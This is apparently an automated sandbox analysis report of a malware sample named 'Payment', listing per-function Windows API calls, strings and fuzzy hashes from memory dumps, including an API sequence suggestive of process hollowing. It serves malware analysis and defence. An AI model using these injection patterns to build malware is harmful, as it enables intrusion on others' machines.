                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 040b72c96b7279d57726e9e715b022b8d538229e07cb79f3e25332a016f7a0d3
                                                          • Instruction ID: fa01429c316a648a710f75e7419f5893e965f6a2c787658e3cf20057ebc4b6a7
                                                          • Opcode Fuzzy Hash: 040b72c96b7279d57726e9e715b022b8d538229e07cb79f3e25332a016f7a0d3
                                                          • Instruction Fuzzy Hash: CC113376610208BADF208F64DC80EABBBB8EF04740F04846AA906D7210E6719E409BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 02141B2D
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02141B51
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02141B73
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2157017253.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2140000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                          • Instruction ID: a2c1b8e146479f4c030ec732814dba7adffb81f2a761f0aa3dab4348b4ded8a7
                                                          • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                          • Instruction Fuzzy Hash: 41621A34A54258DBEB24CFA4C840BDEB376EF58300F1091A9D11DEB394EB769E81CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD5045: _fseek.LIBCMT ref: 00AD505D
                                                            • Part of subcall function 00B399BE: _wcscmp.LIBCMT ref: 00B39AAE
                                                            • Part of subcall function 00B399BE: _wcscmp.LIBCMT ref: 00B39AC1
                                                          • _free.LIBCMT ref: 00B3992C
                                                          • _free.LIBCMT ref: 00B39933
                                                          • _free.LIBCMT ref: 00B3999E
                                                            • Part of subcall function 00AF2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00AF9C64), ref: 00AF2FA9
                                                            • Part of subcall function 00AF2F95: GetLastError.KERNEL32(00000000,?,00AF9C64), ref: 00AF2FBB
                                                          • _free.LIBCMT ref: 00B399A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                                          • Instruction ID: aea7e19ac9f1a3315b4457d260c00a2ccec520b227ee68c65d047367ebe29434
                                                          • Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                                          • Instruction Fuzzy Hash: 41514AB1D04218AFDF249F64DC81BAEBBB9EF48310F1044AEB609A7341DB715A90CF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                          • Instruction ID: 3be9aadb78e77799a4559f510791fab352e037b84b7430035673649f70d2548e
                                                          • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                          • Instruction Fuzzy Hash: 4C41B37070060E9BDB289FE9C8C09BF77A6EF883A0B24812DFA5587650DBB09D408B44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B0EE62
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00B0EEAC
                                                            • Part of subcall function 00AD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AD48A1,?,?,00AD37C0,?), ref: 00AD48CE
                                                            • Part of subcall function 00AF09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AF09F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 687d57fe89b744850f87bbab73b551f1569701c80ca8607f79dd511d3edc2159
                                                          • Instruction ID: d66c4edead5bf51f0439e1ca9577ee4d3de0a4eefabb50dacf55fc8eb9242e78
                                                          • Opcode Fuzzy Hash: 687d57fe89b744850f87bbab73b551f1569701c80ca8607f79dd511d3edc2159
                                                          • Instruction Fuzzy Hash: 3621A171A002589BCF459F94C845BEE7BF99F49300F04405AF509A7381DFB49989CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: 1dd72095a8395f566791538f343650f8072a1692e6c74e7a36d5c36c4be18e71
                                                          • Instruction ID: 8f049cd277941fe21370a9f94195ba6091bc960290403f315abee4209b0ad69f
                                                          • Opcode Fuzzy Hash: 1dd72095a8395f566791538f343650f8072a1692e6c74e7a36d5c36c4be18e71
                                                          • Instruction Fuzzy Hash: E701B972D04258AEDB28C6A8C856EFE7BF8DB15311F00419AF652D2181E5B5A614DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00B39B82
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B39B99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 745f8389d74faae9cdbc05136883e30809943dfd33c5c392e5f1b3e6683a0451
                                                          • Instruction ID: c77f581383d2a4bcd0c5161e7b62f71493d2be7f912acf39c62799e6f7fe721f
                                                          • Opcode Fuzzy Hash: 745f8389d74faae9cdbc05136883e30809943dfd33c5c392e5f1b3e6683a0451
                                                          • Instruction Fuzzy Hash: 3AD05EB994030EABDB10AB90DC0EFAAB76CE704701F0042E1BE54961A1DEB155988B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e5c3f15fb8dcd78fbe078fafc9e6e737e8c34d0fb31bde1b519974ff979dda9
                                                          • Instruction ID: ee575bdf4227c530720e64508dcfe94a844ca5799cebbf207f7fa84eb624b58c
                                                          • Opcode Fuzzy Hash: 8e5c3f15fb8dcd78fbe078fafc9e6e737e8c34d0fb31bde1b519974ff979dda9
                                                          • Instruction Fuzzy Hash: 52F14C716083019FC714DF28C584A6ABBE5FF88314F14896EF89A9B351DB71EA45CF82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AF03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AF03D3
                                                            • Part of subcall function 00AF03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AF03DB
                                                            • Part of subcall function 00AF03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AF03E6
                                                            • Part of subcall function 00AF03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AF03F1
                                                            • Part of subcall function 00AF03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AF03F9
                                                            • Part of subcall function 00AF03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AF0401
                                                            • Part of subcall function 00AE6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00ADFA90), ref: 00AE62B4
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00ADFB2D
                                                          • OleInitialize.OLE32(00000000), ref: 00ADFBAA
                                                          • CloseHandle.KERNEL32(00000000), ref: 00B149F2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID:
                                                          • API String ID: 1986988660-0
                                                          • Opcode ID: a7c1605ac15e6e1e89602db76435b63251433fdd7e363ebc59eb812f27fea8d8
                                                          • Instruction ID: 7e07563cff92ddd6d4f863f3c3aff5a7e2a2b9022d9ccddb60db57572bfe4420
                                                          • Opcode Fuzzy Hash: a7c1605ac15e6e1e89602db76435b63251433fdd7e363ebc59eb812f27fea8d8
                                                          • Instruction Fuzzy Hash: 3F81B7B19092408FC788EFBAEB516297BE4FBA834871185BB9419C7372EF358804CF55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00AD4401
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AD44A6
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AD44C3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$_memset
                                                          • String ID:
                                                          • API String ID: 1505330794-0
                                                          • Opcode ID: 0ce25cf11e98404e61bbcbdc634d93d558a9a1aa9297383e71fe53fdb2fb5edf
                                                          • Instruction ID: 99aec07d2d3e35c6741afbc672467a79ec81b34144deeaa7366a1bd54a183bb3
                                                          • Opcode Fuzzy Hash: 0ce25cf11e98404e61bbcbdc634d93d558a9a1aa9297383e71fe53fdb2fb5edf
                                                          • Instruction Fuzzy Hash: 6D314CB15047018FD720DF24D98479BBBF8AB49304F00092FF59A83391EB75A984CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 00AF5963
                                                            • Part of subcall function 00AFA3AB: __NMSG_WRITE.LIBCMT ref: 00AFA3D2
                                                            • Part of subcall function 00AFA3AB: __NMSG_WRITE.LIBCMT ref: 00AFA3DC
                                                          • __NMSG_WRITE.LIBCMT ref: 00AF596A
                                                            • Part of subcall function 00AFA408: GetModuleFileNameW.KERNEL32(00000000,00B943BA,00000104,?,00000001,00000000), ref: 00AFA49A
                                                            • Part of subcall function 00AFA408: ___crtMessageBoxW.LIBCMT ref: 00AFA548
                                                            • Part of subcall function 00AF32DF: ___crtCorExitProcess.LIBCMT ref: 00AF32E5
                                                            • Part of subcall function 00AF32DF: ExitProcess.KERNEL32 ref: 00AF32EE
                                                            • Part of subcall function 00AF8D68: __getptd_noexit.LIBCMT ref: 00AF8D68
                                                          • RtlAllocateHeap.NTDLL(01470000,00000000,00000001,00000000,?,?,?,00AF1013,?), ref: 00AF598F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 6c6952b4b48b0abbe0bc9d514a34333fafc827bf6d4272f5cee4c95b302ca3c9
                                                          • Instruction ID: 7f5ece253706c4b26cff6867ebc4f01d66aca6b0e0763f984a79e064e9e14dcc
                                                          • Opcode Fuzzy Hash: 6c6952b4b48b0abbe0bc9d514a34333fafc827bf6d4272f5cee4c95b302ca3c9
                                                          • Instruction Fuzzy Hash: 6901D236700B1EEEEA292BF4D982B7E73989F52731F50002AF704AB1C1DFB09D018660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B397D2,?,?,?,?,?,00000004), ref: 00B39B45
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B39B5B
                                                          • CloseHandle.KERNEL32(00000000,?,00B397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B39B62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: 322059f4a4f15a6e55e31c399ede70799d6bc2fed894ae1d4c84af1482899c29
                                                          • Instruction ID: 86b6cb7fe9fd0232c01da98934c456e4c8d7cea32396d5d6585e1496bd09315a
                                                          • Opcode Fuzzy Hash: 322059f4a4f15a6e55e31c399ede70799d6bc2fed894ae1d4c84af1482899c29
                                                          • Instruction Fuzzy Hash: 48E08632181715B7E7212B54EC09FDABB58EB05762F104160FB14BA0E08BB129119798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 00B38FA5
                                                            • Part of subcall function 00AF2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00AF9C64), ref: 00AF2FA9
                                                            • Part of subcall function 00AF2F95: GetLastError.KERNEL32(00000000,?,00AF9C64), ref: 00AF2FBB
                                                          • _free.LIBCMT ref: 00B38FB6
                                                          • _free.LIBCMT ref: 00B38FC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                          • Instruction ID: e90684e9b47b52d0d6b418f68770d4550d41076135c95566e1fa5c4d1841ce5a
                                                          • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                          • Instruction Fuzzy Hash: C7E012A16197054ACA24A5B8AE40BA377FE9F48350F280C5DB50ADB142DE24E8518724
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: 439d0add46a303c2e6ebe6335bcaa4ae38174d2aad8f16b7aa3b51bae7d55697
                                                          • Instruction ID: 17844e76f1d52c8a215992bebb6d2c139cde9738ec180dcf615b9095525ddac5
                                                          • Opcode Fuzzy Hash: 439d0add46a303c2e6ebe6335bcaa4ae38174d2aad8f16b7aa3b51bae7d55697
                                                          • Instruction Fuzzy Hash: 85224674518251DFC724DF14C594B6ABBF1BB48300F1589AEE89A8B362DB71ED81CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: EA06
                                                          • API String ID: 4104443479-3962188686
                                                          • Opcode ID: 97ef624ce8d8f931b9e879b4b8c7969307397b00822b52775420fa8ab08888c2
                                                          • Instruction ID: ad2e792e798d3016d0c22e8260cbaa72632b7d534b86ae81f8bf750bd987e379
                                                          • Opcode Fuzzy Hash: 97ef624ce8d8f931b9e879b4b8c7969307397b00822b52775420fa8ab08888c2
                                                          • Instruction Fuzzy Hash: EA415A31A041587BDF219B6489917FE7FB6AF4D300F6840B7F8839B392CA719D8087A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00AD4992
                                                            • Part of subcall function 00AF35AC: __lock.LIBCMT ref: 00AF35B2
                                                            • Part of subcall function 00AF35AC: DecodePointer.KERNEL32(00000001,?,00AD49A7,00B281BC), ref: 00AF35BE
                                                            • Part of subcall function 00AF35AC: EncodePointer.KERNEL32(?,?,00AD49A7,00B281BC), ref: 00AF35C9
                                                            • Part of subcall function 00AD4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AD4A73
                                                            • Part of subcall function 00AD4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AD4A88
                                                            • Part of subcall function 00AD3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AD3B7A
                                                            • Part of subcall function 00AD3B4C: IsDebuggerPresent.KERNEL32 ref: 00AD3B8C
                                                            • Part of subcall function 00AD3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B962F8,00B962E0,?,?), ref: 00AD3BFD
                                                            • Part of subcall function 00AD3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00AD3C81
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AD49D2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
                                                          • Opcode ID: 5ec4612f257928357c1a25c96294001b1c9aecaba24413107a4a2ac1aa508305
                                                          • Instruction ID: c47727923d1beab18caa03811d66c1d971b34c3232a81b19e6428bc70ea3e371
                                                          • Opcode Fuzzy Hash: 5ec4612f257928357c1a25c96294001b1c9aecaba24413107a4a2ac1aa508305
                                                          • Instruction Fuzzy Hash: 841189729183119BC700EF69EE05A1AFBE8EB98750F00451FF046833B2DF709A45CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00AD5981,?,?,?,?), ref: 00AD5E27
